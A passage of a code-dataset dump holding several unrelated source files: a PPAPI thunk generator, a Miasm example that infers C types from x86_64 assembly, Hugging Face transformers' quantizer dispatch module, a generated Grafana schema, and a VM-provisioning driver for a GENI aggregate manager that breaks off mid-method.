child.first_release[build]).replace('.', '_')
name += '_' + version
generated_functions.append(name)
out.Write(',\n'.join([' &%s' % f for f in generated_functions]))
out.Write('\n};\n\n')
out.Write('} // namespace\n')
out.Write('\n')
for thunk_type, thunk_name in version_list:
out.Write('PPAPI_THUNK_EXPORT const %s* Get%s_Thunk() {\n' %
(thunk_type, thunk_type))
out.Write(' return &%s;\n' % thunk_name)
out.Write('}\n')
out.Write('\n')
out.Write('} // namespace thunk\n')
out.Write('} // namespace ppapi\n')
tgen = TGen()
def Main(args):
# Default invocation will verify the golden files are unchanged.
failed = 0
if not args:
args = ['--wnone', '--diff', '--test', '--thunkroot=.']
ParseOptions(args)
idldir = os.path.split(sys.argv[0])[0]
idldir = os.path.join(idldir, 'test_thunk', '*.idl')
filenames = glob.glob(idldir)
ast = ParseFiles(filenames)
if tgen.GenerateRange(ast, ['M13', 'M14', 'M15'], {}):
print "Golden file for M13-M15 failed."
failed = 1
else:
print "Golden file for M13-M15 passed."
return failed
if __name__ == '__main__':
sys.exit(Main(sys.argv[1:])) | unknown | codeparrot/codeparrot-clean | ||
"""
This example demonstrates the recovering of possible C types for an arbitrary
variable in an assembly code (the types are inferred from the function
argument types). It also displays the C code used to access this variable.
Input:
* definitions of the C types that can be used by the code
* layout of structures (packed/not packed)
* prototype of the analyzed function
Algorithm:
The DepGraph of the target variable is computed, which gives possible
expressions for this variable. For each DepGraph solution, if the expression
depends on typed arguments, the code infers the variable type and displays the C
code to access this variable.
Here be dragons:
For the moment, Miasm can infer C types (and generate C) for simple expressions.
To summarize, Miasm only supports accesses that do not involve arithmetic or
conditional expressions such as the following:
* var1.field
* var1[12][4]
* *(var1.field->tab[4])
Unsupported forms:
* var1 + var2
* var1[var2+4]
* var1?var2->field:6
In the following example, we have an explicit cast for "age", from uint16_t to
uint64_t, and for "height", from uint32_t to uint64_t. We are adding a naive
reduction rule to support such a cast.
First, in the type inference engine:
ExprCompose(int, 0) => int
Then, in the C generator:
ExprCompose(var1, 0) => var1
"""
from __future__ import print_function
import sys
from future.utils import viewitems, viewvalues
from miasm.analysis.machine import Machine
from miasm.analysis.binary import Container
from miasm.expression.expression import ExprOp, ExprCompose, ExprId, ExprInt
from miasm.analysis.depgraph import DependencyGraph
from miasm.arch.x86.ctype import CTypeAMD64_unk
from miasm.core.objc import ExprToAccessC, CHandler
from miasm.core.objc import CTypesManagerNotPacked
from miasm.core.ctypesmngr import CAstTypes, CTypePtr, CTypeStruct
from miasm.core.locationdb import LocationDB
def find_call(ircfg):
"""Returns (irb, index) which call"""
for irb in viewvalues(ircfg.blocks):
out = set()
if len(irb) < 2:
continue
assignblk = irb[-2]
for src in viewvalues(assignblk):
if not isinstance(src, ExprOp):
continue
if not src.op.startswith('call_func'):
continue
out.add((irb.loc_key, len(irb) - 2))
if len(out) != 1:
continue
loc_key, index = out.pop()
yield loc_key, index
class MyExprToAccessC(ExprToAccessC):
"""Custom ExprToAccessC to complete expression traduction to C"""
def reduce_compose(self, node, **kwargs):
"""Custom reduction rule: {XXX, 0} -> XXX"""
if not (isinstance(node.expr, ExprCompose) and
len(node.expr.args) == 2 and
node.expr.args[1].is_int(0)):
return None
found = []
for subcgenobj in node.args[0].info:
found.append(subcgenobj)
return found
reduction_rules = ExprToAccessC.reduction_rules + [reduce_compose]
def get_funcs_arg0(ctx, lifter_model_call, ircfg, lbl_head):
"""Compute DependencyGraph on the func @lbl_head"""
g_dep = DependencyGraph(ircfg, follow_call=False)
element = lifter_model_call.arch.regs.RSI
for loc_key, index in find_call(ircfg):
irb = ircfg.get_block(loc_key)
instr = irb[index].instr
print('Analysing references from:', hex(instr.offset), instr)
g_list = g_dep.get(irb.loc_key, set([element]), index, set([lbl_head]))
for dep in g_list:
emul_result = dep.emul(lifter_model_call, ctx)
value = emul_result[element]
yield value
class MyCHandler(CHandler):
"""Custom CHandler to add complementary C handling rules"""
exprToAccessC_cls = MyExprToAccessC
loc_db = LocationDB()
data = open(sys.argv[1], 'rb').read()
# Digest C information
text = """
struct human {
unsigned short age;
unsigned int height;
char name[50];
};
struct ll_human {
struct ll_human* next;
struct human human;
};
"""
base_types = CTypeAMD64_unk()
types_ast = CAstTypes()
types_ast.add_c_decl(text)
types_mngr = CTypesManagerNotPacked(types_ast, base_types)
# Analyze binary
cont = Container.fallback_container(data, None, addr=0)
machine = Machine("x86_64")
dis_engine, lifter_model_call = machine.dis_engine, machine.lifter_model_call
mdis = dis_engine(cont.bin_stream, loc_db=loc_db)
addr_head = 0
asmcfg = mdis.dis_multiblock(addr_head)
lbl_head = loc_db.get_offset_location(addr_head)
lifter = lifter_model_call(loc_db)
ircfg = lifter.new_ircfg_from_asmcfg(asmcfg)
open('graph_irflow.dot', 'w').write(ircfg.dot())
# Main function's first argument's type is "struct ll_human*"
ptr_llhuman = types_mngr.get_objc(CTypePtr(CTypeStruct('ll_human')))
arg0 = ExprId('ptr', 64)
ctx = {lifter.arch.regs.RDI: arg0}
expr_types = {arg0: (ptr_llhuman,),
ExprInt(0x8A, 64): (ptr_llhuman,)}
mychandler = MyCHandler(types_mngr, expr_types)
for expr in get_funcs_arg0(ctx, lifter, ircfg, lbl_head):
print("Access:", expr)
for c_str, ctype in mychandler.expr_to_c_and_types(expr):
print('\taccess:', c_str)
print('\tc type:', ctype) | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2024 The HuggingFace Inc. team. All rights reserved.
# Modifications Copyright (C) 2025, Advanced Micro Devices, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from ..models.auto.configuration_auto import AutoConfig
from ..utils import logging
from ..utils.quantization_config import (
AqlmConfig,
AutoRoundConfig,
AwqConfig,
BitNetQuantConfig,
BitsAndBytesConfig,
CompressedTensorsConfig,
EetqConfig,
FbgemmFp8Config,
FineGrainedFP8Config,
FPQuantConfig,
GPTQConfig,
HiggsConfig,
HqqConfig,
Mxfp4Config,
QuantizationConfigMixin,
QuantizationMethod,
QuantoConfig,
QuarkConfig,
SpQRConfig,
TorchAoConfig,
VptqConfig,
)
from .base import HfQuantizer
from .quantizer_aqlm import AqlmHfQuantizer
from .quantizer_auto_round import AutoRoundQuantizer
from .quantizer_awq import AwqQuantizer
from .quantizer_bitnet import BitNetHfQuantizer
from .quantizer_bnb_4bit import Bnb4BitHfQuantizer
from .quantizer_bnb_8bit import Bnb8BitHfQuantizer
from .quantizer_compressed_tensors import CompressedTensorsHfQuantizer
from .quantizer_eetq import EetqHfQuantizer
from .quantizer_fbgemm_fp8 import FbgemmFp8HfQuantizer
from .quantizer_finegrained_fp8 import FineGrainedFP8HfQuantizer
from .quantizer_fp_quant import FPQuantHfQuantizer
from .quantizer_gptq import GptqHfQuantizer
from .quantizer_higgs import HiggsHfQuantizer
from .quantizer_hqq import HqqHfQuantizer
from .quantizer_mxfp4 import Mxfp4HfQuantizer
from .quantizer_quanto import QuantoHfQuantizer
from .quantizer_quark import QuarkHfQuantizer
from .quantizer_spqr import SpQRHfQuantizer
from .quantizer_torchao import TorchAoHfQuantizer
from .quantizer_vptq import VptqHfQuantizer
AUTO_QUANTIZER_MAPPING = {
"awq": AwqQuantizer,
"bitsandbytes_4bit": Bnb4BitHfQuantizer,
"bitsandbytes_8bit": Bnb8BitHfQuantizer,
"gptq": GptqHfQuantizer,
"aqlm": AqlmHfQuantizer,
"quanto": QuantoHfQuantizer,
"quark": QuarkHfQuantizer,
"fp_quant": FPQuantHfQuantizer,
"eetq": EetqHfQuantizer,
"higgs": HiggsHfQuantizer,
"hqq": HqqHfQuantizer,
"compressed-tensors": CompressedTensorsHfQuantizer,
"fbgemm_fp8": FbgemmFp8HfQuantizer,
"torchao": TorchAoHfQuantizer,
"bitnet": BitNetHfQuantizer,
"vptq": VptqHfQuantizer,
"spqr": SpQRHfQuantizer,
"fp8": FineGrainedFP8HfQuantizer,
"auto-round": AutoRoundQuantizer,
"mxfp4": Mxfp4HfQuantizer,
}
AUTO_QUANTIZATION_CONFIG_MAPPING = {
"awq": AwqConfig,
"bitsandbytes_4bit": BitsAndBytesConfig,
"bitsandbytes_8bit": BitsAndBytesConfig,
"eetq": EetqConfig,
"gptq": GPTQConfig,
"aqlm": AqlmConfig,
"quanto": QuantoConfig,
"quark": QuarkConfig,
"fp_quant": FPQuantConfig,
"hqq": HqqConfig,
"compressed-tensors": CompressedTensorsConfig,
"fbgemm_fp8": FbgemmFp8Config,
"higgs": HiggsConfig,
"torchao": TorchAoConfig,
"bitnet": BitNetQuantConfig,
"vptq": VptqConfig,
"spqr": SpQRConfig,
"fp8": FineGrainedFP8Config,
"auto-round": AutoRoundConfig,
"mxfp4": Mxfp4Config,
}
logger = logging.get_logger(__name__)
class AutoQuantizationConfig:
"""
The Auto-HF quantization config class that takes care of automatically dispatching to the correct
quantization config given a quantization config stored in a dictionary.
"""
@classmethod
def from_dict(cls, quantization_config_dict: dict):
quant_method = quantization_config_dict.get("quant_method")
# We need a special care for bnb models to make sure everything is BC ..
if quantization_config_dict.get("load_in_8bit", False) or quantization_config_dict.get("load_in_4bit", False):
suffix = "_4bit" if quantization_config_dict.get("load_in_4bit", False) else "_8bit"
quant_method = QuantizationMethod.BITS_AND_BYTES + suffix
elif quant_method is None:
raise ValueError(
"The model's quantization config from the arguments has no `quant_method` attribute. Make sure that the model has been correctly quantized"
)
if quant_method not in AUTO_QUANTIZATION_CONFIG_MAPPING:
raise ValueError(
f"Unknown quantization type, got {quant_method} - supported types are:"
f" {list(AUTO_QUANTIZER_MAPPING.keys())}"
)
target_cls = AUTO_QUANTIZATION_CONFIG_MAPPING[quant_method]
return target_cls.from_dict(quantization_config_dict)
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, **kwargs):
model_config = AutoConfig.from_pretrained(pretrained_model_name_or_path, **kwargs)
if getattr(model_config, "quantization_config", None) is None:
raise ValueError(
f"Did not found a `quantization_config` in {pretrained_model_name_or_path}. Make sure that the model is correctly quantized."
)
quantization_config_dict = model_config.quantization_config
quantization_config = cls.from_dict(quantization_config_dict)
# Update with potential kwargs that are passed through from_pretrained.
quantization_config.update(**kwargs)
return quantization_config
class AutoHfQuantizer:
"""
The Auto-HF quantizer class that takes care of automatically instantiating to the correct
`HfQuantizer` given the `QuantizationConfig`.
"""
@classmethod
def from_config(cls, quantization_config: QuantizationConfigMixin | dict, **kwargs):
# Convert it to a QuantizationConfig if the q_config is a dict
if isinstance(quantization_config, dict):
quantization_config = AutoQuantizationConfig.from_dict(quantization_config)
quant_method = quantization_config.quant_method
# Again, we need a special care for bnb as we have a single quantization config
# class for both 4-bit and 8-bit quantization
if quant_method == QuantizationMethod.BITS_AND_BYTES:
if quantization_config.load_in_8bit:
quant_method += "_8bit"
else:
quant_method += "_4bit"
if quant_method not in AUTO_QUANTIZER_MAPPING:
raise ValueError(
f"Unknown quantization type, got {quant_method} - supported types are:"
f" {list(AUTO_QUANTIZER_MAPPING.keys())}"
)
target_cls = AUTO_QUANTIZER_MAPPING[quant_method]
return target_cls(quantization_config, **kwargs)
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, **kwargs):
quantization_config = AutoQuantizationConfig.from_pretrained(pretrained_model_name_or_path, **kwargs)
return cls.from_config(quantization_config)
@classmethod
def merge_quantization_configs(
cls,
quantization_config: dict | QuantizationConfigMixin,
quantization_config_from_args: QuantizationConfigMixin | None,
):
"""
handles situations where both quantization_config from args and quantization_config from model config are present.
"""
if quantization_config_from_args is not None:
warning_msg = (
"You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading"
" already has a `quantization_config` attribute. The `quantization_config` from the model will be used."
)
else:
warning_msg = ""
if isinstance(quantization_config, dict):
# Convert the config based on the type of quantization_config_from_args (e.g., AutoRoundConfig), which takes priority before automatic configuration dispatch.
if isinstance(quantization_config_from_args, AutoRoundConfig):
quantization_config = AutoRoundConfig.from_dict(quantization_config)
else:
quantization_config = AutoQuantizationConfig.from_dict(quantization_config)
if (
quantization_config_from_args is not None
and quantization_config.__class__.__name__ != quantization_config_from_args.__class__.__name__
):
raise ValueError(
f"The model is quantized with {quantization_config.__class__.__name__} but you are passing a {quantization_config_from_args.__class__.__name__} config. "
"Please make sure to pass the same quantization config class to `from_pretrained` with different loading attributes."
)
if (
isinstance(
quantization_config,
(
GPTQConfig,
AwqConfig,
AutoRoundConfig,
FbgemmFp8Config,
CompressedTensorsConfig,
Mxfp4Config,
FineGrainedFP8Config,
),
)
and quantization_config_from_args is not None
):
loading_attr_dict = quantization_config_from_args.get_loading_attributes()
for attr, val in loading_attr_dict.items():
setattr(quantization_config, attr, val)
warning_msg += f"However, loading attributes (e.g. {list(loading_attr_dict.keys())}) will be overwritten with the one you passed to `from_pretrained`. The rest will be ignored."
if warning_msg != "" and not isinstance(quantization_config, (Mxfp4Config, FineGrainedFP8Config)):
warnings.warn(warning_msg)
else:
# in the case of mxfp4, we don't want to print the warning message, bit confusing for users
logger.info(warning_msg)
return quantization_config
@staticmethod
def supports_quant_method(quantization_config_dict):
quant_method = quantization_config_dict.get("quant_method", None)
if quantization_config_dict.get("load_in_8bit", False) or quantization_config_dict.get("load_in_4bit", False):
suffix = "_4bit" if quantization_config_dict.get("load_in_4bit", False) else "_8bit"
quant_method = QuantizationMethod.BITS_AND_BYTES + suffix
elif quant_method is None:
raise ValueError(
"The model's quantization config from the arguments has no `quant_method` attribute. Make sure that the model has been correctly quantized"
)
if quant_method not in AUTO_QUANTIZATION_CONFIG_MAPPING:
logger.warning(
f"Unknown quantization type, got {quant_method} - supported types are:"
f" {list(AUTO_QUANTIZER_MAPPING.keys())}. Hence, we will skip the quantization. "
"To remove the warning, you can delete the quantization_config attribute in config.json"
)
return False
return True
def register_quantization_config(method: str):
"""Register a custom quantization configuration."""
def register_config_fn(cls):
if method in AUTO_QUANTIZATION_CONFIG_MAPPING:
raise ValueError(f"Config '{method}' already registered")
if not issubclass(cls, QuantizationConfigMixin):
raise TypeError("Config must extend QuantizationConfigMixin")
AUTO_QUANTIZATION_CONFIG_MAPPING[method] = cls
return cls
return register_config_fn
def register_quantizer(name: str):
"""Register a custom quantizer."""
def register_quantizer_fn(cls):
if name in AUTO_QUANTIZER_MAPPING:
raise ValueError(f"Quantizer '{name}' already registered")
if not issubclass(cls, HfQuantizer):
raise TypeError("Quantizer must extend HfQuantizer")
AUTO_QUANTIZER_MAPPING[name] = cls
return cls
return register_quantizer_fn
def get_hf_quantizer(config, quantization_config, device_map, weights_only, user_agent):
pre_quantized = hasattr(config, "quantization_config")
if pre_quantized and not AutoHfQuantizer.supports_quant_method(config.quantization_config):
pre_quantized = False
if pre_quantized or quantization_config is not None:
if pre_quantized:
config.quantization_config = AutoHfQuantizer.merge_quantization_configs(
config.quantization_config, quantization_config
)
else:
config.quantization_config = quantization_config
hf_quantizer = AutoHfQuantizer.from_config(
config.quantization_config,
pre_quantized=pre_quantized,
)
else:
hf_quantizer = None
if hf_quantizer is not None:
hf_quantizer.validate_environment(
device_map=device_map,
weights_only=weights_only,
)
device_map = hf_quantizer.update_device_map(device_map)
config = hf_quantizer.update_tp_plan(config)
config = hf_quantizer.update_ep_plan(config)
# In order to ensure popular quantization methods are supported. Can be disable with `disable_telemetry`
if not getattr(hf_quantizer.quantization_config, "dequantize", False):
quant_method = hf_quantizer.quantization_config.quant_method
user_agent["quant"] = getattr(quant_method, "value", quant_method)
return hf_quantizer, config, device_map | python | github | https://github.com/huggingface/transformers | src/transformers/quantizers/auto.py |
//
// Code generated by grafana-app-sdk. DO NOT EDIT.
//
package v0alpha1
import (
"github.com/grafana/grafana-app-sdk/resource"
)
// schema is unexported to prevent accidental overwrites
var (
schemaDummy = resource.NewSimpleSchema("historian.alerting.grafana.app", "v0alpha1", NewDummy(), &DummyList{}, resource.WithKind("Dummy"),
resource.WithPlural("dummys"), resource.WithScope(resource.NamespacedScope))
kindDummy = resource.Kind{
Schema: schemaDummy,
Codecs: map[resource.KindEncoding]resource.Codec{
resource.KindEncodingJSON: &DummyJSONCodec{},
},
}
)
// Kind returns a resource.Kind for this Schema with a JSON codec
func DummyKind() resource.Kind {
return kindDummy
}
// Schema returns a resource.SimpleSchema representation of Dummy
func DummySchema() *resource.SimpleSchema {
return schemaDummy
}
// Interface compliance checks
var _ resource.Schema = kindDummy | go | github | https://github.com/grafana/grafana | apps/alerting/historian/pkg/apis/alertinghistorian/v0alpha1/dummy_schema_gen.go |
# -*- coding: utf-8 -*-
# Copyright 2014-2015 National Institute of Advanced Industrial Science and Technology
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from am.geniutils.src.xrn.xrn import hrn_to_urn, urn_to_hrn
from am.rspecs.src.geni.v3.container.resource import Resource
from am.rspecs.src.geni.v3.container.sliver import Sliver
from am.rspecs.src.geni.v3.container.link import Link
from vt_manager_kvm.controller.drivers.VTDriver import VTDriver
from vt_manager_kvm.controller.dispatchers.xmlrpc.ProvisioningDispatcher import ProvisioningDispatcher
from vt_manager_kvm.models.VirtualMachineKeys import VirtualMachineKeys
from vt_manager_kvm.utils.contextualization.vm_contextualize import VMContextualize
from vt_manager_kvm.utils.UrlUtils import UrlUtils
from vt_manager_kvm.models.VirtualMachine import VirtualMachine
from vt_manager_kvm.models.VTServer import VTServer
from vt_manager_kvm.models.Action import Action
from vt_manager_kvm.models.Reservation import Reservation
from vt_manager_kvm.models.expiring_components import ExpiringComponents
from vt_manager_kvm.utils.SyncThread import SyncThread
from vt_manager_kvm.utils.ServiceProcess import ServiceProcess
from vt_manager_kvm.utils.ServiceThread import ServiceThread
from vt_manager_kvm.communication.utils.XmlHelper import XmlHelper
from vt_manager_kvm.communication.utils.XmlHelper import XmlCrafter
from vt_manager_kvm.models.VirtualMachineKeys import VirtualMachineKeys
#from geniutils.src.xrn.xrn import hrn_to_urn
#from geniutils.src.xrn.xrn import urn_to_hrn
import multiprocessing
import threading
import copy
import uuid
import logging
import random
from datetime import datetime
from datetime import timedelta
import dateutil.parser
import traceback
class VTAMDriver:
logger = logging.getLogger("vtam")
def __init__(self):
self.__geni_best_effort_mode = True
self.__agent_callback_url = "SFA.OCF.VTM"
self.__mutex_thread = threading.Lock()
self.__mutex_process = multiprocessing.Lock()
self.GENI_ALLOCATED = "geni_allocated"
self.GENI_UNALLOCATED = "geni_unallocated"
self.GENI_PROVISIONED = "geni_provisioned"
self.GENI_READY = "geni_ready"
self.GENI_NOT_READY = "geni_notready"
self.GENI_CONFIGURING = "geni_configuring"
self.GENI_FAILED = "geni_failed"
self.GENI_PENDING_TO_ALLOCATE = "geni_pending_allocation"
self.GENI_UPDATING_USERS = "geni_updating_users"
self.__config = None
def get_version(self):
return None
def get_specific_server_and_vms1(self, urn, geni_available=False):
"""
When 'available' is False or unspecified, all resources must be retrieved.
"""
VTAMDriver.logger.debug("XXX urn = " + urn)
params = self.__urn_to_vm_params(urn)
servers = VTServer.objects.all()
resources = list()
vms = list()
for server in servers:
if not server.available and geni_available:
continue
VTAMDriver.logger.debug("virttech = " + server.getVirtTech())
# Look for provisioned VMs
vms_provisioned = list()
child = server.getChildObject()
if child:
VTAMDriver.logger.debug("child = " + child.__class__.__name__)
vms_provisioned.extend(child.getVMs(**params))
else:
continue
vms_provisioned = child.getVMs(**params)
vm_names = self.__return_vm_names(vms_provisioned)
vms_allocated = Reservation.objects.filter(server__id=server.id, **params)
if len(vms_allocated) == 0:
continue
for vm1 in vms_allocated:
pass
vms.extend(vms_provisioned)
# ... Also for reserved VMs
vms.extend(vms_provisioned)
# NOTE: if there are VMs provisioned, these are the ones to be returned
# Explanation: when a VM is provisioned, the reservation for the
# VM may still be active, but it is of no interest to the user
#if not vms_provisioned:
vms.extend(vms_allocated)
if vms:
converted_resources = self.__convert_to_resources_with_slivers(server, vms)
resources.extend(converted_resources)
return resources
def get_specific_server_and_vms(self, urn, geni_available=False):
"""
When 'available' is False or unspecified, all resources must be retrieved.
"""
VTAMDriver.logger.debug("XXX urn = " + urn)
params = self.__urn_to_vm_params(urn)
servers = VTServer.objects.all()
resources = list()
for server in servers:
vms = list()
if not server.available and geni_available:
continue
VTAMDriver.logger.debug("virttech = " + server.getVirtTech())
# Look for provisioned VMs
vms_provisioned = list()
child = server.getChildObject()
if child:
VTAMDriver.logger.debug("child = " + child.__class__.__name__)
vms_provisioned.extend(child.getVMs(**params))
# ... Also for reserved VMs
vm_names = self.__return_vm_names(vms_provisioned)
# NOTE: if there are VMs provisioned, these are the ones to be returned
# Explanation: when a VM is provisioned, the reservation for the
# VM may still be active, but it is of no interest to the user
#if not vms_provisioned:
vms_allocated = Reservation.objects.filter(server__id=server.id, **params).exclude(name__in = vm_names)
vms.extend(vms_provisioned)
vms.extend(vms_allocated)
if vms:
converted_resources = self.__convert_to_resources_with_slivers(server, vms)
resources.extend(converted_resources)
return resources
def __return_vm_names(self, vms):
names = list()
for vm in vms:
names.append(vm.name)
return names
def get_all_servers(self, geni_available=False):
"""
When 'available' is False or unspecified, all resources must be retrieved.
"""
resources = list()
servers = VTServer.objects.all()
for server in servers:
if server.available or not geni_available:
resource = self.__convert_to_resource(server)
resources.append(resource)
links = self.__convert_to_links(server)
resources.extend(links)
else:
continue
return resources
def __validate_precondition_states(self, vm, method_name=""):
method_name += " action"
# Methods that alter VirtualMachine should not operate on VMs in a transient state ("..." on it)
if "..." in self.__translate_to_operational_state(vm):
raise Exception("REFUSED to perform %s on sliver in a transient state" % str(method_name))
def create_vms(self, urn, expiration=None, users=list(), geni_best_effort=True):
#TODO: Manage Exceptions,
vm_params = self.__urn_to_vm_params(urn)
reservations = Reservation.objects.filter(**vm_params)
# Provisioning a VM must be made after an Allocate. Allocate:Provisioning follow 1:1 ratio
if not reservations:
# Be cautious when changing the messages, as handler depends on those
raise Exception("No allocation found")
# Retrieve only the reservations that are provisioned
reservations = Reservation.objects.filter(**vm_params).filter(is_provisioned=False)
if not reservations:
# Be cautious when changing the messages, as handler depends on those
raise Exception("Re-provisioning not possible. Try allocating first")
slivers_to_manifest = list()
for r in reservations:
try:
provisioning_rspec = self.get_action_instance(r)
with self.__mutex_thread:
SyncThread.startMethodAndJoin(ProvisioningDispatcher.processProvisioning,provisioning_rspec,self.__agent_callback_url)
# Update vm_params to get the exact, corresponding VM for each reservation
vm_params.update({"name": r.name})
vms = VirtualMachine.objects.filter(**vm_params)
VTAMDriver.logger.debug("XXX vms.len = " + str(len(vms)))
self.__store_user_keys(users, vms)
# When reservation (allocation) is fulfilled, mark appropriately
r.set_provisioned(True)
r.save()
except Exception as e:
if geni_best_effort:
manifested_resource = self.__convert_to_resources_with_slivers(r.server,vms,expiration)
manifested_resource.set_error_message(str(e))
if type(manifested_resource) == list:
slivers_to_manifest.extend(manifested_resource)
else:
slivers_to_manifest.append(manifested_resource)
continue
else:
raise e
# XXX FIXME Check this to see why N slivers are being returned
manifested_resource = self.__convert_to_resources_with_slivers(r.server,vms,expiration)
if type(manifested_resource) == list:
slivers_to_manifest.extend(manifested_resource)
else:
slivers_to_manifest.append(manifested_resource)
self.__add_expiration(expiration, reservations[0].projectName, reservations[0].sliceName)
return slivers_to_manifest
def reserve_vms(self, slice_urn, reservation, expiration=None, users=list()):
# URNs of foreign RMs are not served
current_cm_hrn = self.__config.CM_HRN
cm_id = getattr(reservation, "get_component_manager_id")
if callable(cm_id):
cm_id = urn_to_hrn(cm_id())[0]
if current_cm_hrn != cm_id:
# No reservation is provided for URNs of other CMs
return None
# VMs are dynamic resource -> no collision will happen
slice_hrn, hrn_type = urn_to_hrn(slice_urn)
if not reservation.get_component_id() == None:
server_hrn, hrn_type = urn_to_hrn(reservation.get_component_id())
server_name = server_hrn.split(".")[-1]
VTAMDriver.logger.debug("server_name = " + server_name + ", server_hrn = " + server_hrn)
else:
server_name = self.__get_best_server()
server_hrn = self.__config.CM_HRN + "." + server_name
VTAMDriver.logger.debug("server_name = " + server_name + ", server_hrn = " + server_hrn)
server = VTServer.objects.get(name=server_name).getChildObject()
server_id = server.id
if reservation.get_id():
if Reservation.objects.filter(sliceName=slice_hrn, projectName=slice_hrn, name=reservation.get_id()) or VirtualMachine.objects.filter(sliceName=slice_hrn, projectName=slice_hrn, name=reservation.get_id()):
raise Exception("There is another VM with client id %s on this slice already <GENI PROVISIONED> or <GENI ALLOCATED>" %reservation.get_id())
reservation_name = reservation.get_id()
else:
reservation_name = str(random.randint(0,1000*1000))
if expiration == None:
expiration = datetime.utcnow() + timedelta(hours=168)
reserved_vm = Reservation()
#reserved_vm.reservation_id = random.randint(0,1000)
reserved_vm.server_id = server_id
reserved_vm.set_slice_name(slice_hrn)
reserved_vm.set_project_name(slice_hrn)
reserved_vm.set_name(reservation_name)
reserved_vm.set_valid_until(str(expiration))
reserved_vm.uuid = str(uuid.uuid4())
reserved_vm.set_disk_image(reservation.get_disk_image())
reserved_vm.save()
if not reservation.get_sliver():
reservation.set_sliver(Sliver())
# Set information for sliver
sliver_urn = hrn_to_urn(server_hrn+"." + slice_hrn.split(".")[-1] + "." +str(reservation_name), "sliver")
VTAMDriver.logger.debug("XXX sliver_urn = " + sliver_urn)
reservation.get_sliver().set_urn(sliver_urn)
reservation.get_sliver().set_allocation_status(self.GENI_ALLOCATED)
reservation.get_sliver().set_expiration(expiration)
reservation.get_sliver().set_operational_status(self.GENI_NOT_READY)
reservation.get_sliver().set_client_id(reservation_name)
reservation.set_allocation_status = self.GENI_ALLOCATED
#vm_params = self.__urn_to_vm_params(slice_urn)
#self.__store_user_keys(users, vm_params)
return reservation
def renew_vms(self, urn, expiration):
vm_params = self.__urn_to_vm_params(urn)
resources = list()
try:
provisioned_vms = VirtualMachine.objects.filter(**vm_params)
if provisioned_vms:
for provisioned_vm in provisioned_vms:
self.__add_expiration(expiration, provisioned_vm.projectName, provisioned_vm.sliceName)
except Exception as e:
if self.__geni_best_effort:
resources.extend(self.get_specific_server_and_vms(urn))
for resource in resources:
resource.set_error_message(str(e))
continue
else:
raise e
# An existing Reservation and a non existing VirtualMachine implies there is only an allocated VM
try:
reserved_vms = Reservation.objects.filter(**vm_params)
for reserved_vm in reserved_vms:
reserved_vm.set_valid_until(expiration)
reserved_vm.save()
self.__add_expiration(expiration, reserved_vm.projectName, reserved_vm.sliceName)
resources.extend(self.__convert_to_resources_with_slivers(reserved_vm.server, [reserved_vm], expiration))
except Exception as e:
if reserved_vms:
for reserved_vm in reserved_vms:
self.__add_expiration(expiration, reserved_vm.projectName, reserved_vm.sliceName)
resources.extend(self.__convert_to_resources_with_slivers(reserved_vm.server, [reserved_vm], expiration))
raise e
return self.get_specific_server_and_vms(urn)
def start_vm(self, urn):
return self.__crud_vm(urn, Action.PROVISIONING_VM_START_TYPE)
def stop_vm(self, urn):
return self.__crud_vm(urn, Action.PROVISIONING_VM_STOP_TYPE)
def reboot_vm(self, urn):
try:
self.stop_vm(urn)
return self.start_vm(urn)
except Exception as e:
# Note: Some problems with MINIMUM_RESTART_TIME
return self.__crud_vm(urn, Action.PROVISIONING_VM_REBOOT_TYPE)
def delete_vm(self, urn):
vm_params = self.__urn_to_vm_params(urn)
vms_allocated = Reservation.objects.filter(**vm_params)
vms_provisioned = VirtualMachine.objects.filter(**vm_params)
if not vms_allocated and not vms_provisioned:
raise Exception("Slice Does not Exists")
# Remove SSH keys for each provisioned VM
for vm_provisioned in vms_provisioned:
params_list = self.__vm_to_ssh_keys_params_list(vm_provisioned)
for params in params_list:
VirtualMachineKeys.objects.filter(**params).delete()
# Provisioned VMs are deleted here
resources = self.__crud_vm(urn, Action.PROVISIONING_VM_DELETE_TYPE)
if vms_provisioned or vms_allocated:
expirations = ExpiringComponents.objects.filter(slice = vm_params["sliceName"])
if expirations:
expiration = expirations[0].expires
else:
expiration = None
for resource in resources:
resource.set_allocation_state(self.GENI_UNALLOCATED)
resource.set_operational_state(self.GENI_PENDING_TO_ALLOCATE)
resource.get_sliver().set_allocation_status(self.GENI_UNALLOCATED)
resource.get_sliver().set_operational_status(self.GENI_PENDING_TO_ALLOCATE)
resource.get_sliver().set_expiration(expiration)
# Allocated VMs are deleted here
vms_allocated.delete()
if not resources:
raise Exception("Slice Does Not Exist")
return resources
def get_geni_best_effort_mode(self):
return self.__geni_best_effort_mode
def set_geni_best_effort_mode(self, value):
self.__geni_best_effort_mode = value
def __crud_vm(self, urn, action):
params = self.__urn_to_vm_params(urn)
servers = VTServer.objects.all()
vm_server_pairs = list()
resources = list()
for server in servers:
vms = list()
VTAMDriver.logger.debug("XXX server = " + str(server.__class__))
# Look for provisioned VMs
vms_provisioned = server.getChildObject().getVMs(**params)
# ... Also for reserved VMs
vms_allocated = Reservation.objects.filter(server__id=server.id, **params)
vms.extend(vms_provisioned)
vms.extend(vms_allocated)
for vm in vms:
VTAMDriver.logger.debug("XXX vm = " + str(vm.__class__))
# The following is to be executed only for provisioned VMs
if isinstance(vm, VirtualMachine):
# Return "REFUSED" exception if sliver is in a transient state
self.__validate_precondition_states(vm, action)
# Return "BUSY" exception if sliver is in incorrect operational state
if self.__translate_to_operational_state(vm) == self.GENI_UPDATING_USERS:
